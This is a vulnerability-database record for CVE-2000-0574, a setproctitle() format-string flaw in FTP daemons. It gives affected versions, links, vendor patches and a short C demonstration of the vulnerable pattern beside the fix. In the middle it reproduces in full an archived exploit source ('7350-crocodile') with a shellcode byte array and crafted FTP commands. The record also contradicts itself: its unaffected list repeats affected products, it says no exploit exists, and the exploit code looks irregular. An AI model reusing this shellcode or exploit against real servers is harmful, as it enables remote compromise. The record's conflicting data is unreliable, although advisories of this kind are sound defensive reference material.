CVE-2000-0574
CVSS5.0
Published: 2000-07-07 00:00:00
Last modified: 2008-09-10 15:05:03
NMCOES

[Original] FTP servers such as OpenBSD ftpd, NetBSD ftpd, ProFTPd and Opieftpd do not properly cleanse untrusted format strings that are used in the setproctitle function (sometimes called by set_proc_title), which allows remote attackers to cause a denial of service or execute arbitrary commands.


[CNNVD] Multiple vendor ftpd setproctitle() format string vulnerability (CNNVD-200007-014)

FTP servers such as OpenBSD ftpd, NetBSD ftpd, ProFTPd and Opieftpd do not properly sanitize untrusted format strings used in the setproctitle function (sometimes called set_proc_title); a remote attacker can cause a denial of service or execute arbitrary commands.

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: NONE [no impact on system integrity]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: [--]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

cpe:/a:washington_university:wu-ftpd:2.4.2_vr16
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr15
cpe:/a:washington_university:wu-ftpd:2.4.2_vr17
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr12
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr14
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr9
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr7
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18::academ
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr10
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr13
cpe:/a:washington_university:wu-ftpd:2.4.2_beta1::academ
cpe:/a:openbsd:ftpd:5.60 (OpenBSD ftpd 5.60)
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr4
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr5
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr8
cpe:/a:openbsd:ftpd:5.51 (OpenBSD ftpd 5.51)
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr11
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr6
cpe:/a:washington_university:wu-ftpd:2.5
cpe:/a:washington_university:wu-ftpd:2.6

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0574
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0574
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200007-014
(official data source) CNNVD

- Other links and resources

http://www.cert.org/advisories/CA-2000-13.html
(VENDOR_ADVISORY)  CERT  CA-2000-13
http://www.securityfocus.com/bid/1438
(UNKNOWN)  BID  1438
http://www.securityfocus.com/bid/1425
(UNKNOWN)  BID  1425
http://archives.neohapsis.com/archives/bugtraq/2000-07/0121.html
(UNKNOWN)  BUGTRAQ  20000710 opieftpd setproctitle() patches
http://archives.neohapsis.com/archives/bugtraq/2000-07/0061.html
(UNKNOWN)  BUGTRAQ  20000706 ftpd and setproctitle()
http://archives.neohapsis.com/archives/bugtraq/2000-07/0031.html
(UNKNOWN)  BUGTRAQ  20000705 proftp advisory
ftp://ftp.NetBSD.ORG/pub/NetBSD/misc/security/advisories/NetBSD-SA2000-009.txt.asc
(UNKNOWN)  NETBSD  NetBSD-SA2000-009

- Vulnerability information

Multiple vendor ftpd setproctitle() format string vulnerability
Medium severity  Format string
2000-07-07 00:00:00 2006-09-20 00:00:00
Remote
FTP servers such as OpenBSD ftpd, NetBSD ftpd, ProFTPd and Opieftpd do not properly sanitize untrusted format strings used in the setproctitle function (sometimes called set_proc_title); a remote attacker can cause a denial of service or execute arbitrary commands.

- Advisories and patches

OpenBSD ftpd:
A patch is available at
http://www.openbsd.org/errata.html#ftpd
ProFTPD:
Upgrade to ProFTPD 1.2.0 when it is available.
Manual patch:
Replace the call to setproctitle() in set_proc_title() with a properly used format string.
Replace:
setproctitle(statbuf);
with
setproctitle("%s", statbuf);
wu-ftpd - upgrade to version 2.6.1:
ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-2.6.1.tar.gz
ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-2.6.1.tar.gz.asc
ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-2.6.1.tar.Z
ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-2.6.1.tar.Z.asc
SuSE Linux - updates are available.
http://suse.de/de/support/security/suse_security_announce_571.txt
Debian:
This problem has been corrected in netstd 3.07-7slink.4 for Debian 2.1 (slink) and in ftpd 0.11-8potato.1 for Debian 2.2 (potato). We recommend upgrading your ftpd immediately.
Fixed in: Debian 2.1 (slink):
Source:
http://security.debian.org/dists/slink/updates/source/netstd_3.07-7slink.4.diff.gz
http://security.debian.org/dists/slink/updates/source/netstd_3.07-7slink.4.dsc
http://security.debian.org/dists/slink/updates/source/netstd_3.07.orig.tar.gz
alpha:
http://security.debian.org/dists/slink/updates/binary-alpha/netstd_3.07-7slink.4_alpha.deb
i386:
http://security.debian.org/dists/slink/updates/binary-i386/netstd_3.07-7slink.4_i386.deb
m68k:
http://security.debian.org/dists/slink/updates/binary-m68k/netstd_3.07-7slink.4_m68k.deb
sparc:
http://security.debian.org/dists/slink/updates/binary-sparc/netstd_3.07-7slink.4_sparc.deb
Debian 2.2 (potato):
Source:
http://security.debian.org/dists/potato/updates/main/source/linux-ftpd_0.11-8potato.1.diff.gz
http://security.debian.org/dists/potato/updates/main/source/linux-ftpd_0.11-8potato.1.dsc
http://security.debian.org/dists/potato/updates/main/source/linux-ftpd_0.11.orig.tar.gz
arm:
http://security.debian.org/dists/potato/updates/main/binary-arm/ftpd_0.11-8potato.1_arm.deb
i386:
http://security.debian.org/dists/potato/updates/main/binary-i386/ftpd_0.11-8potato.1_i386.deb
sparc:
http://security.debian.org/dists/potato/updates/main/binary-sparc/ftpd_0.11-8potato.1_sparc.deb

ProFTPD Project ProFTPD 1.2 pre4
ProFTPD Project ProFTPD 1.2 pre5
ProFTPD Project ProFTPD 1.2 pre8
ProFTPD Project ProFTPD 1.2 pre6
ProFTPD Project ProFTPD 1.2 pre1

- Vulnerability information (396)

OpenBSD ftp Exploit (teso) (EDBID:396)
bsd local
2002-01-01 Verified
0 Teso
N/A
/* 7350-crocodile - x86/OpenBSD ftp exploit
 *
 * by lorian and scut / TESO
 * 
 *
 * TESO CONFIDENTIAL - SOURCE MATERIALS
 *
 * This is unpublished proprietary source code of TESO Security.
 *
 * The contents of these coded instructions, statements and computer
 * programs may not be disclosed to third parties, copied or duplicated in
 * any form, in whole or in part, without the prior written permission of
 * TESO Security. This includes especially the Bugtraq mailing list, the
 * www.hack.co.za website and any public exploit archive.
 *
 * (C) COPYRIGHT TESO Security, 2002
 * All Rights Reserved
 *
 *****************************************************************************
 *
 * greetz: synnergy, GOBBLES Security
 *
 */

#include <stdio.h>
#include <stdlib.h>   /* atoi */
#include <string.h>
#include <strings.h>  /* bzero */
#define RET 0xbfffeb30


#define VERSION  "0.2.0"
#define USERNAME "anonymous"
#define PASSWORD "guest@"


char shellcode[] =

"\x32\xdb\x81\xd1\xb1\x72\xcd\x83"
"\x21\x21\x31\xc2\x32\xdb\xb5\x27"
"\xcd\x71\x23\xc2\xb3\x72\xcd\x81"
"\x32\xc1\x12\xdb\xb4\x3e\xcd\x81"
"\xeb\x4f\x35\xc2\x31\xc1\x5e\xb1"
"\x32\x7d\x5e\x98\xfe\xc2\xb8\xed"
"\xcd\x79\x38\xc1\x1d\x3e\x18\xb1"
"\x3d\xcd\x82\x32\xc1\xbb\xd2\xd2"
"\xd2\xff\xf2\xdb\x39\xc1\xb2\x11"
"\x56\x75\xce\x82\x0e\x81\xc9\x13"
"\xe5\xf2\x1e\xb5\x0d\x8d\x1e\x11"
"\xcd\x21\x31\xc2\x09\x42\x21\x19"
"\x70\x48\x21\x41\x9c\xb3\x2b\x81"
"\xf1\x2d\x2e\x18\x1d\x32\x7c\xcd"
"\x82\xe2\xac\xff\xff\xff";

void mkd(char *dir)
{
        char blah[2048], *p;
        int n;
        bzero(blah, sizeof(blah));

        p = blah;
         for(n=1; n<strlen(dir); n++){
                if(dir[n] == '\xff'){
                        *p = '\xff';
                        p++;
                }
                *p = dir[n];
                p++;
        }

        printf("MKD %s\r\n", blah);
        printf("CWD %s\r\n", blah);
}

int
main (int argc, char *argv[])
{

char *buf;
char buf2[200];
char buf1[400];
char dir2[255];
char *p;
char *q;
char tmp[255];
int a;
int offset;
int i;

  if (argc > 0) offset = atoi(argv[0]);
    else offset = 1;

fprintf(stderr, "ret-addr = 0x%x\n", RET + offset);
fprintf(stderr, "shell size = %d\n", sizeof(shellcode));

dir2[231] = '\1';
memset(dir2, '\x70', 255);

        printf("user %s\r\n", USERNAME);
        printf("pass %s\r\n", PASSWORD);
        printf("cwd %s\r\n", argv[2]);

memset(buf1, 0x50, 150);
p = &buf1[sizeof(argv[0])];
q = &buf1[399];
*q = '\x00';
while(q <= p) {
        strncpy(tmp, p, 80);
        mkd(tmp);
        p+=255; }

        mkd(dir2);
        mkd(shellcode);
        mkd("bin");
        mkd("sh");

        memset(buf2, 0x30, 40);
// var 96
for(i=4; i<20; i+=4)
        *(long *)&buf2[i+1] = RET;
p = &buf2[0];
q = &buf2[50];
strncpy(tmp, p, 20);
 mkd(tmp);
 printf("pwd\r\n");
}


// milw0rm.com [2002-01-01]
		

- Vulnerability information

7541
Multiple FTP Server setproctitle Function Arbitrary Command Execution
Exploit Public

- Vulnerability description

Unknown or Incomplete

- Timeline

2000-07-05 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Multiple Vendor ftpd setproctitle() Format String Vulnerability
Input Validation Error 1425
Yes No
2000-07-05 12:00:00 2009-07-11 02:56:00
This vulnerability was posted to the Bugtraq mailing list on July 5, 2000 by lamagra <lamagra@digibel.org>.

- Affected program versions

S.u.S.E. Linux 6.4 ppc
S.u.S.E. Linux 6.4 alpha
S.u.S.E. Linux 6.4
S.u.S.E. Linux 6.3 ppc
S.u.S.E. Linux 6.3 alpha
S.u.S.E. Linux 6.3
S.u.S.E. Linux 6.2
S.u.S.E. Linux 6.1
S.u.S.E. Linux 6.0
ProFTPD Project ProFTPD 1.2 pre9
ProFTPD Project ProFTPD 1.2 pre8
ProFTPD Project ProFTPD 1.2 pre7
ProFTPD Project ProFTPD 1.2 pre6
ProFTPD Project ProFTPD 1.2 pre5
ProFTPD Project ProFTPD 1.2 pre4
ProFTPD Project ProFTPD 1.2 pre3
ProFTPD Project ProFTPD 1.2 pre2
ProFTPD Project ProFTPD 1.2 pre10
ProFTPD Project ProFTPD 1.2 pre1
opieftpd ftp 1.3
OpenBSD OpenBSD 2.7
OpenBSD OpenBSD 2.6
OpenBSD OpenBSD 2.5
OpenBSD OpenBSD 2.4
OpenBSD OpenBSD 2.3
OpenBSD OpenBSD 2.2
OpenBSD OpenBSD 2.1
OpenBSD OpenBSD 2.0
NetBSD NetBSD 1.4.2 x86
NetBSD NetBSD 1.4.2 SPARC
NetBSD NetBSD 1.4.2 arm32
NetBSD NetBSD 1.4.2 Alpha
NetBSD NetBSD 1.4.1 x86
NetBSD NetBSD 1.4.1 SPARC
NetBSD NetBSD 1.4.1 arm32
NetBSD NetBSD 1.4.1 Alpha
NetBSD NetBSD 1.4 x86
NetBSD NetBSD 1.4 SPARC
NetBSD NetBSD 1.4 arm32
NetBSD NetBSD 1.4 Alpha
NetBSD NetBSD 1.3.3
NetBSD NetBSD 1.3.2
NetBSD NetBSD 1.3.1
NetBSD NetBSD 1.3
NetBSD NetBSD 1.2.1
NetBSD NetBSD 1.2
NetBSD NetBSD 1.1
NetBSD NetBSD 1.0
Linux ftpd 0.16
HP HP-UX 11.0
HP HP-UX 10.20
HP HP-UX 10.10
FreeBSD FreeBSD 2.1.7.1
FreeBSD FreeBSD 2.1.6.1
FreeBSD FreeBSD 2.1.6
FreeBSD FreeBSD 2.1.5
FreeBSD FreeBSD 2.1
FreeBSD FreeBSD 2.0.5
FreeBSD FreeBSD 2.0
FreeBSD FreeBSD 1.1.5.1
Debian Linux 2.2
Debian Linux 2.1
SGI IRIX 6.5.8
SGI IRIX 6.5
SGI IRIX 6.4
SGI IRIX 6.3
SGI IRIX 6.2
SGI IRIX 6.1
SGI IRIX 6.0
SGI IRIX 5.3
SGI IRIX 5.2
SGI IRIX 5.1
SGI IRIX 5.0
SGI IRIX 4.0
SGI IRIX 3.3
SGI IRIX 3.2
ProFTPD Project ProFTPD 1.2
+ Cobalt Qube 3.0
+ Cobalt Qube 2.0
+ Cobalt RaQ 3.0
+ Cobalt RaQ 2.0
+ Cobalt RaQ 1.1
Linux ndis-wrapper 1.28 RC2
FreeBSD FreeBSD 5.0 alpha
FreeBSD FreeBSD 5.0
FreeBSD FreeBSD 4.0 alpha
FreeBSD FreeBSD 4.0
FreeBSD FreeBSD 3.5
FreeBSD FreeBSD 3.4
FreeBSD FreeBSD 3.3
FreeBSD FreeBSD 3.2
FreeBSD FreeBSD 3.1
FreeBSD FreeBSD 3.0
FreeBSD FreeBSD 2.2.8
FreeBSD FreeBSD 2.2.6
FreeBSD FreeBSD 2.2.5
FreeBSD FreeBSD 2.2.4
FreeBSD FreeBSD 2.2.3
FreeBSD FreeBSD 2.2.2
FreeBSD FreeBSD 2.2

- Unaffected program versions

SGI IRIX 6.5.8
SGI IRIX 6.5
SGI IRIX 6.4
SGI IRIX 6.3
SGI IRIX 6.2
SGI IRIX 6.1
SGI IRIX 6.0
SGI IRIX 5.3
SGI IRIX 5.2
SGI IRIX 5.1
SGI IRIX 5.0
SGI IRIX 4.0
SGI IRIX 3.3
SGI IRIX 3.2
ProFTPD Project ProFTPD 1.2
+ Cobalt Qube 3.0
+ Cobalt Qube 2.0
+ Cobalt RaQ 3.0
+ Cobalt RaQ 2.0
+ Cobalt RaQ 1.1
Linux ndis-wrapper 1.28 RC2
FreeBSD FreeBSD 5.0 alpha
FreeBSD FreeBSD 5.0
FreeBSD FreeBSD 4.0 alpha
FreeBSD FreeBSD 4.0
FreeBSD FreeBSD 3.5
FreeBSD FreeBSD 3.4
FreeBSD FreeBSD 3.3
FreeBSD FreeBSD 3.2
FreeBSD FreeBSD 3.1
FreeBSD FreeBSD 3.0
FreeBSD FreeBSD 2.2.8
FreeBSD FreeBSD 2.2.6
FreeBSD FreeBSD 2.2.5
FreeBSD FreeBSD 2.2.4
FreeBSD FreeBSD 2.2.3
FreeBSD FreeBSD 2.2.2
FreeBSD FreeBSD 2.2

- Vulnerability discussion

A number of ftp daemons, including versions of wu-ftpd, OpenBSD ftpd (ports of this package are distributed with some Linux distributions), HP-UX ftpd, and proftpd, have a vulnerability caused by the passing of user input to the set_proc_title() function. This function uses the user data to build a buffer and then calls setproctitle(), which is declared as setproctitle(char *fmt, ...). The buffer is passed as the format argument; setproctitle in turn calls vsnprintf() with that buffer as the format string. By carefully manipulating the contents of this buffer, a remote user can cause values on the stack to be overwritten and potentially cause arbitrary code to be executed as root.
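The set_proc_title() pattern described above, alongside the "%s" fix given in the solution section, as an added example that is not part of this record or of any of the affected daemons' source: mock_setproctitle() is a stand-in for setproctitle(3) that renders into a static buffer so the effect can be inspected, and the client path is a constructed input.

```c
#include <stdarg.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>
static char proc_title[256];

/* Stand-in for setproctitle(3): like the real one, it hands fmt to
 * vsnprintf(), so whatever sits in the fmt position is parsed for '%'. */
static void mock_setproctitle(const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(proc_title, sizeof proc_title, fmt, ap);
    va_end(ap);
}

/* Vulnerable pattern: a status buffer built from a client-supplied path is
 * passed in the format position, so '%' sequences in the path are interpreted
 * rather than copied.  The demo uses only "%%" (rendered as "%"); directives
 * that consume missing arguments are undefined behaviour, which is the bug. */
const char *set_proc_title_vulnerable(const char *client_path)
{
    char statbuf[256];
    snprintf(statbuf, sizeof statbuf, "ftpd: client: %s", client_path);
    mock_setproctitle(statbuf);        /* BUG: untrusted data as fmt */
    return proc_title;
}

/* Fixed pattern (setproctitle("%s", statbuf)): constant format, data as argument. */
const char *set_proc_title_fixed(const char *client_path)
{
    char statbuf[256];
    snprintf(statbuf, sizeof statbuf, "ftpd: client: %s", client_path);
    mock_setproctitle("%s", statbuf);  /* path is copied byte for byte */
    return proc_title;
}

/* Audit helper: flags untrusted text that a format parser would act on. */
bool contains_format_directive(const char *s)
{
    return strchr(s, '%') != NULL;
}

int main(void)
{
    const char *path = "/pub/100%%_done";   /* constructed sample client input */
    printf("vulnerable: %s\n", set_proc_title_vulnerable(path));
    printf("fixed:      %s\n", set_proc_title_fixed(path));
    return 0;
}
```

Compiling with -Wformat-security is a cheap way to catch the vulnerable call shape in real code, provided the function carries a printf-style format attribute as the BSD setproctitle(3) prototype does.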

- Exploit

Currently the SecurityFocus staff are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Solution


OpenBSD ftpd:
A patch is available at http://www.openbsd.org/errata.html#ftpd

ProFTPD:
Upgrade to ProFTPD 1.2.0 when it is available.

Manual patch:
Replace the call to setproctitle() in the set_proc_title() with a properly used format string.
Replace:
setproctitle(statbuf);
with
setproctitle("%s", statbuf);

wu-ftpd - upgrade to version 2.6.1:
ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-2.6.1.tar.gz
ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-2.6.1.tar.gz.asc
ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-2.6.1.tar.Z
ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-2.6.1.tar.Z.asc

SuSE Linux - updates are available.
http://suse.de/de/support/security/suse_security_announce_571.txt

Debian:
This problem has been corrected in netstd 3.07-7slink.4 for Debian 2.1 (slink) and in ftpd 0.11-8potato.1 for Debian 2.2 (potato). We recommend upgrading your ftpd immediately.

Fixed in: Debian 2.1 (slink):
Source:
http://security.debian.org/dists/slink/updates/source/netstd_3.07-7slink.4.diff.gz
http://security.debian.org/dists/slink/updates/source/netstd_3.07-7slink.4.dsc
http://security.debian.org/dists/slink/updates/source/netstd_3.07.orig.tar.gz
alpha:
http://security.debian.org/dists/slink/updates/binary-alpha/netstd_3.07-7slink.4_alpha.deb
i386:
http://security.debian.org/dists/slink/updates/binary-i386/netstd_3.07-7slink.4_i386.deb
m68k:
http://security.debian.org/dists/slink/updates/binary-m68k/netstd_3.07-7slink.4_m68k.deb
sparc:
http://security.debian.org/dists/slink/updates/binary-sparc/netstd_3.07-7slink.4_sparc.deb
Debian 2.2 (potato):
Source:
http://security.debian.org/dists/potato/updates/main/source/linux-ftpd_0.11-8potato.1.diff.gz
http://security.debian.org/dists/potato/updates/main/source/linux-ftpd_0.11-8potato.1.dsc
http://security.debian.org/dists/potato/updates/main/source/linux-ftpd_0.11.orig.tar.gz
arm:
http://security.debian.org/dists/potato/updates/main/binary-arm/ftpd_0.11-8potato.1_arm.deb
i386:
http://security.debian.org/dists/potato/updates/main/binary-i386/ftpd_0.11-8potato.1_i386.deb
sparc:
http://security.debian.org/dists/potato/updates/main/binary-sparc/ftpd_0.11-8potato.1_sparc.deb


ProFTPD Project ProFTPD 1.2 pre4

ProFTPD Project ProFTPD 1.2 pre5

ProFTPD Project ProFTPD 1.2 pre8

ProFTPD Project ProFTPD 1.2 pre6

ProFTPD Project ProFTPD 1.2 pre1

ProFTPD Project ProFTPD 1.2 pre9

ProFTPD Project ProFTPD 1.2 pre7

ProFTPD Project ProFTPD 1.2 pre3

ProFTPD Project ProFTPD 1.2 pre2

ProFTPD Project ProFTPD 1.2 pre10

opieftpd ftp 1.3

HP HP-UX 10.10

HP HP-UX 10.20

HP HP-UX 11.0

- Related references

 

 
